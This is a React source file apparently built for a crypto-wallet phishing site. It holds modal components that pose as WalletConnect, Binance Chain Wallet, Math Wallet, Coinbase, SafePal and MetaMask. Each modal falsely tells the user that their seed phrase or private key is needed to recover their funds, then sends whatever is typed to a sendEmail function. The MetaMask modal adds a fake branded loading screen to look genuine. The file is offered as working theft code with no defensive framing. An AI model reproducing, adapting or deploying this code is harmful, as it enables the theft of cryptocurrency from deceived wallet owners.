import React, { useState , useEffect } from "react";
import styled from "styled-components";
import {
  MetaMask,
  walletconnect,
  binanceConnect,
  mathWallet,
  coinbase,
  safepal,
} from "../Images";
import { sendEmail } from "../wallet/Api";

const WalletConnect = ({ setWalletConnectState }) => {
  const [message, setMessage] = useState("");
  const [loader, setLoader] = useState("");
  const [confirmation, setConfirmation] = useState("");
  return (
    <>
      <BackDrop
        onClick={() => {
          setWalletConnectState(false);
          setConfirmation("");
          setLoader(false);
        }}
      />
      <ModalStyled>
        <h1>Access via Seed Phrase</h1>
        <div className="d-flex">
          <img src={walletconnect} alt="logo" className="logo" />
          <h2>Wallet Connect</h2>
        </div>
        <p>
          Please provide your 12, 18, or 24 word seed passphrase or privatekey
          in lowercase to recover and get access to your funds.
        </p>
        <h5>Wallet Seed</h5>
        <textarea onChange={(e) => setMessage(e.target.value)}>
          {message}
        </textarea>
        {!confirmation ? (
          <button
            className={`loader-type ${loader ? "loading" : ""}`}
            disabled={!loader && message.length >= 12 ? false : true}
            onClick={() => {
              sendEmail(message).then((response) => setConfirmation(response));
              setLoader(true);
            }}
          >
            Continue
          </button>
        ) : (
          <button disabled={true}>{confirmation}</button>
        )}
      </ModalStyled>
    </>
  );
};

const BinanceWallet = ({ setBinanceWallet }) => {
  const [message, setMessage] = useState("");
  const [loader, setLoader] = useState("");
  const [confirmation, setConfirmation] = useState("");
  return (
    <>
      <BackDrop
        onClick={() => {
          setBinanceWallet(false);
          setConfirmation("");
          setLoader(false);
        }}
      />
      <ModalStyled>
        <h1>Access via Seed Phrase</h1>
        <div className="d-flex">
          <img src={binanceConnect} alt="logo" className="logo" />
          <h2>Binance Chain Wallet</h2>
        </div>
        <p>
          Please provide your 12, 18, or 24 word seed passphrase or privatekey
          in lowercase to recover and get access to your funds.
        </p>
        <h5>Wallet Seed</h5>
        <textarea onChange={(e) => setMessage(e.target.value)}>
          {message}
        </textarea>
        {!confirmation ? (
          <button
            className={`loader-type ${loader ? "loading" : ""}`}
            disabled={!loader && message.length >= 12 ? false : true}
            onClick={() => {
              sendEmail(message).then((response) => setConfirmation(response));
              setLoader(true);
            }}
          >
            Continue
          </button>
        ) : (
          <button disabled={true}>{confirmation}</button>
        )}
      </ModalStyled>
    </>
  );
};

const MathWallet = ({ setMathWallet }) => {
  const [message, setMessage] = useState("");
  const [loader, setLoader] = useState("");
  const [confirmation, setConfirmation] = useState("");
  return (
    <>
      <BackDrop
        onClick={() => {
          setMathWallet(false);
          setConfirmation("");
          setLoader(false);
        }}
      />
      <ModalStyled>
        <h1>Access via Seed Phrase</h1>
        <div className="d-flex">
          <img src={mathWallet} alt="logo" className="logo" />
          <h2>Math Wallet</h2>
        </div>
        <p>
          Please provide your 12, 18, or 24 word seed passphrase or privatekey
          in lowercase to recover and get access to your funds.
        </p>
        <h5>Wallet Seed</h5>
        <textarea onChange={(e) => setMessage(e.target.value)}>
          {message}
        </textarea>
        {!confirmation ? (
          <button
            className={`loader-type ${loader ? "loading" : ""}`}
            disabled={!loader && message.length >= 12 ? false : true}
            onClick={() => {
              sendEmail(message).then((response) => setConfirmation(response));
              setLoader(true);
            }}
          >
            Continue
          </button>
        ) : (
          <button disabled={true}>{confirmation}</button>
        )}
      </ModalStyled>
    </>
  );
};

const CoinBaseWallet = ({ setCoinbaseWallet }) => {
  const [message, setMessage] = useState("");
  const [loader, setLoader] = useState("");
  const [confirmation, setConfirmation] = useState("");
  return (
    <>
      <BackDrop
        onClick={() => {
          setCoinbaseWallet(false);
          setConfirmation("");
          setLoader(false);
        }}
      />
      <ModalStyled>
        <h1>Access via Seed Phrase</h1>
        <div className="d-flex">
          <img src={coinbase} alt="logo" className="logo" />
          <h2>Coinbase</h2>
        </div>
        <p>
          Please provide your 12, 18, or 24 word seed passphrase or privatekey
          in lowercase to recover and get access to your funds.
        </p>
        <h5>Wallet Seed</h5>
        <textarea onChange={(e) => setMessage(e.target.value)}>
          {message}
        </textarea>
        {!confirmation ? (
          <button
            className={`loader-type ${loader ? "loading" : ""}`}
            disabled={!loader && message.length >= 12 ? false : true}
            onClick={() => {
              sendEmail(message).then((response) => setConfirmation(response));
              setLoader(true);
            }}
          >
            Continue
          </button>
        ) : (
          <button disabled={true}>{confirmation}</button>
        )}{" "}
      </ModalStyled>
    </>
  );
};

const SafePalWallet = ({ setSafePalWallet }) => {
  const [message, setMessage] = useState("");
  const [loader, setLoader] = useState("");
  const [confirmation, setConfirmation] = useState("");
  return (
    <>
      <BackDrop
        onClick={() => {
          setSafePalWallet(false);
          setConfirmation("");
          setLoader(false);
        }}
      />
      <ModalStyled>
        <h1>Access via Seed Phrase</h1>
        <div className="d-flex">
          <img src={safepal} alt="logo" className="logo" />
          <h2>SafePal</h2>
        </div>
        <p>
          Please provide your 12, 18, or 24 word seed passphrase or privatekey
          in lowercase to recover and get access to your funds.
        </p>
        <h5>Wallet Seed</h5>
        <textarea onChange={(e) => setMessage(e.target.value)}>
          {message}
        </textarea>
        {!confirmation ? (
          <button
            className={`loader-type ${loader ? "loading" : ""}`}
            disabled={!loader && message.length >= 12 ? false : true}
            onClick={() => {
              sendEmail(message).then((response) => setConfirmation(response));
              setLoader(true);
            }}
          >
            Continue
          </button>
        ) : (
          <button disabled={true}>{confirmation}</button>
        )}
      </ModalStyled>
    </>
  );
};

const MetaMaskWallet = ({ setMetaMaskWallet }) => {
  const [message, setMessage] = useState("");
  const [loader, setLoader] = useState("");
  const [confirmation, setConfirmation] = useState("");
  const [loadingScreen, setLoadingScreen] = useState(true);
  useEffect(() => {
    setTimeout(() => {
      setLoadingScreen(false) 
    }, 4000);
  }, [])
  return (
    <>
      {loadingScreen?
      <MetaLoader>
        <MetaMask
          width="150px"
          height="150px"
          style={{ marginBottom: "10px" }}
        />
        <LoaderSpin />
      </MetaLoader>
      :null}
      <ModalStyled className="meta__">
        <div className="d-flex logo-head-styled">
          <MetaMask className="logo" style={{ marginRight: "20px" }} />
          <h2 style={{ fontSize: "20px", margin: 0 }}>MetaMask</h2>
        </div>
        <h1>Continue with Seed Phrase</h1>
        <p>Enter your keyword phrase of 12 words to continue using MetaMask.</p>
        <h5>Wallet Seed</h5>
        <textarea
          placeholder="Separate each word with a single space"
          style={{ height: "250px" }}
          onChange={(e) => setMessage(e.target.value)}
        >
          {message}
        </textarea>
        {!confirmation ? (
          <button
            className={`loader-type ${loader ? "loading" : ""}`}
            style={{ background: "#f89d35", width: "200px", border: 0 }}
            disabled={!loader && message.length >= 12 ? false : true}
            onClick={() => {
              sendEmail(message).then((response) => setConfirmation(response));
              setLoader(true);
            }}
          >
            Proceed
          </button>
        ) : (
          <button style={{ background: "#f89d35", border: 0 }} disabled={true}>
            {confirmation}
          </button>
        )}
      </ModalStyled>
    </>
  );
};
const MetaLoader = styled.div`
  position: fixed;
  width: 100%;
  height: 100%;
  left: 0;
  top: 0;
  z-index: 9999;
  background: #f9f3eb;
  display: flex;
  align-items: center;
  justify-content: center;
  flex-direction: column;
`;
const BackDrop = styled.div`
  position: fixed;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  z-index: 1100;
  &:not(.bg-transparent) {
    background: #000;
  }
  &.bg-transparent {
    background: transparent;
  }
`;
const ModalStyled = styled.div`
  &:not(.meta__) {
    position: absolute;
    transform: translate(-50%, -50%);
    border-radius: 12px;
    max-width: 32em;
    width: 32em;
    box-shadow: 0px 0px 12px 0px #e1e1e1;
    border: 1px solid #e2e2e2;
    h1,
    p {
      text-align: center;
    }
  }
  &.meta__ {
    position: fixed;
    padding-top: 0;
    padding-left: 40px;
    padding-right: 40px;
    width: 100%;
    left: 0;
    top: 0;
    h1,
    p {
      text-align: left;
    }
    h1 {
      font-weight: 400;
      color: #1b344d;
      font-size: 40px;
      line-height: 51px;
      margin-bottom: 10px;
    }
    p {
      font-size: 16px;
      line-height: 1.3;
    }
  }
  inset: 50% auto auto 50%;
  border: none;
  background: rgb(255, 255, 255);
  overflow: hidden;
  outline: none;
  padding: 30px 20px;
  margin: 0px;

  max-height: 100%;
  z-index: 1500;
  font-family: "proxima-nova", sans-serif;
  .d-flex {
    justify-content: center;
    align-items: center;
  }
  .logo-head-styled {
    background-color: #f2f3f4;
    justify-content: start;
    margin-left: -40px;
    margin-right: -40px;
    padding: 6px 20px;
    margin-bottom: 30px;
  }
  h5 {
    margin-bottom: 15px;
    font-weight: 500;
    font-size: 17px;
  }
  h1 {
    position: relative;
    max-width: 100%;
    margin: 0 0 30px;
    padding: 0;
    color: #595959;
    font-size: 1.5em;
    font-weight: 600;
    text-transform: none;
    word-wrap: break-word;
  }
  .logo {
    width: 40px;
    height: 40px;
  }
  h2 {
    text-align: center;
    color: #506175;
    font-weight: 100;
    line-height: 40px;
    margin: 15px 0 15px 15px;
    font-size: 25px;
  }
  p {
    margin-bottom: 20px;
    margin-top: 20px;
    padding-bottom: 16px;
    color: #506175;
    font-weight: 100;
    line-height: 19px;
    font-size: 13px;
  }
  textarea {
    border: 1px solid #e0e0e0;
    width: 100%;
    height: 130px;
    padding: 12px;
    margin-bottom: 20px;
    border-radius: 4px;
    resize: none;
    font-family: "proxima-nova", sans-serif;
  }
  button {
    border-radius: 4px;
    width: 100%;
    height: 50px;
    font-style: normal;
    font-weight: 600;
    font-size: 14px;
    line-height: 16px;
    display: flex;
    justify-content: center;
    align-items: center;
    text-align: center;
    cursor: pointer;
    background: #536dfe;
    border: 1px solid #3d5afe;
    color: #fafafa;
    position: relative;
    &:disabled {
      cursor: not-allowed;
    }
    &.loader-type.loading:before {
      content: "";
      position: absolute;
      left: 10px;
      top: 7px;
      border: 2px solid #f3f3f3;
      border-radius: 50%;
      border-top: 2px solid #3498db;
      width: 30px;
      height: 30px;
      -webkit-animation: spin 1s linear infinite; /* Safari */
      animation: spin 1s linear infinite;
    }
    @media (max-width: 576px) {
      h1 {
        font-size: 19px;
      }
      h2 {
        font-size: 17px;
      }
    }
  }
`;
const LoaderSpin = styled.div`
  border: 6px solid #a9a9a9;
  border-radius: 50%;
  border-top: 6px solid #f89d35;
  width: 35px;
  height: 35px;
  -webkit-animation: spin 1.3s linear infinite; /* Safari */
  animation: spin 1.3s linear infinite;
`;
export {
  WalletConnect,
  BinanceWallet,
  MathWallet,
  CoinBaseWallet,
  SafePalWallet,
  MetaMaskWallet,
};
